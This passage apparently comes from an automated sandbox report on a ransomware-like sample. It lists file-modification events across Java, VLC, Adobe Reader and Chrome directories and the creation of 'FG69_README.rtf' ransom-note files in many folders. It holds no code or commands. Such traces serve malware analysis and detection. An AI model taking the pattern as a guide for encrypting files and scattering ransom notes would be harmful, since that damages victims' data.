Files\Java\jdk1.7.0_80\db\lib\derbyLocale_es.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+1 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\SetUse.vdw d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Jamaica d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Managua d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\HST d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Rome d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Winnipeg d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Melbourne d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\flavormap.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\derby_common.bat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\epl-v10.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\GRAY.pf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\meta-index d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Nauru d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\charsets.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jsadebugd.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\St_Johns d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Chisinau d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Athens d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\US_export_policy.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Darwin d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\manifest.json d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Tell_City d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij.bat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-charts.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Maputo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\rmiregistry.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Campo_Grande d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chicago d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.artifact.repository.prefs d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tahiti d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ko.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\sound.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Gambier d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\SearchEdit.vstm d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Volgograd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\db\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4ADT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Efate d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\El_Aaiun d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cuiaba d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sitka d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Curacao d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunjce_provider.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Merida d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\soundcloud.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EET d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Athens d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Ushuaia d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\bn.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+11 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Inuvik d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ar.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kaliningrad d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Mozilla Firefox\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Resolute d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vilnius d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\PST8PDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification 